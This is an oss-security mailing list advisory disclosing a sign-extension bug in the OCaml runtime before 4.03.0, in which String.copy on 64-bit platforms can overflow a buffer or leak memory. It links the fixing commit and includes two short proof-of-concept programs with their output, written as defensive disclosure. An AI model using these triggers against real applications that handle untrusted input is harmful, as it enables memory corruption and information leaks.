Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <4868d0749e044d6491f11118f6e10d45@S1688.EX1688.lan>
Date: Fri, 29 Apr 2016 00:18:22 +0000
From: Pascal Cuoq <cuoq@...st-in-soft.com>
To: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>
CC: "cve-assign@...re.org" <cve-assign@...re.org>
Subject: buffer overflow and information leak in OCaml < 4.03.0

OCaml versions 4.02.3 and earlier have a runtime bug that, on 64-bit platforms, causes sizes arguments to an internal memmove call to be sign-extended from 32 to 64-bits before being passed to the memmove function.

This leads arguments between 2GiB and 4GiB to be interpreted as larger than they are (specifically, a bit below 2^64), causing a buffer overflow.

Arguments between 4GiB and 6GiB are interpreted as 4GiB smaller than they should be, causing a possible information leak.

This commit fixes the bug: https://github.com/ocaml/ocaml/commit/659615c7b100a89eafe6253e7a5b9d84d0e8df74#diff-a97df53e3ebc59bb457191b496c90762
The function caml_bit_string is called indirectly from such functions as String.copy. String.copy for instance is supposed to be a "safe" function for which OCaml's memory safety guarantees apply.

Proof of concept:
- buffer overflow

Hexa:~ $ ocamlopt -v

The OCaml native-code compiler, version 4.00.1

Standard library directory: /usr/local/Frama-C/ocaml-4.00.1p/lib/ocaml

Hexa:~ $ cat buffer_ovflw.ml

open Printf


let s1 = String.make 0x80000003 'a';;

let () = Printf.printf "%c" s1.[1];;

let s2 = String.copy s1;;

let () = Printf.printf "%c" s2.[1];;

Hexa:~ $ ocamlopt buffer_ovflw.ml && ./a.out

Segmentation fault: 11

- information leak

Hexa:~ $ cat infoleak.ml

let s1 = String.make 0x100000003 'a';;

let () = Printf.printf "%c" s1.[1];;

let s2 = String.copy s1;;

let () =

  for i = 4 to 40 do

    Printf.printf "%2x" (Char.code s2.[i]);

  done;

  Printf.printf "\n"

;;

Hexa:~ $ ocamlopt infoleak.ml && ./a.out

a 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0


OCaml applications, compiled with OCaml 4.02.3 or earlier on a 64-bit platform, that apply the defective copy functions to untrusted inputs are at risk. These applications should be recompiled with OCaml 4.03.0.

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.